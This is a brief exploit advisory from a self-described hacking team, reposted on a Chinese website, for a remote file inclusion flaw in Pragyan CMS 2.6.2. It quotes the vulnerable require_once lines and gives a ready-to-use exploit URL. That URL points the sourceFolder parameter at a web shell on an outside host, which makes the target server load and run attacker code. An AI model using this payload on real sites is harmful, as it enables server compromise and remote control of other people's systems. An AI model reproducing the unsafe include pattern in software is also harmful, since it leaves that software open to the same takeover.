Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

时间:2021-05-23

<< In The Name Of GOD >>

-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008
-
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Includion
- download :http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
[] & []
--------------------------------------------------------------
if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################
Exploit :
##########################################################
#
# /path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章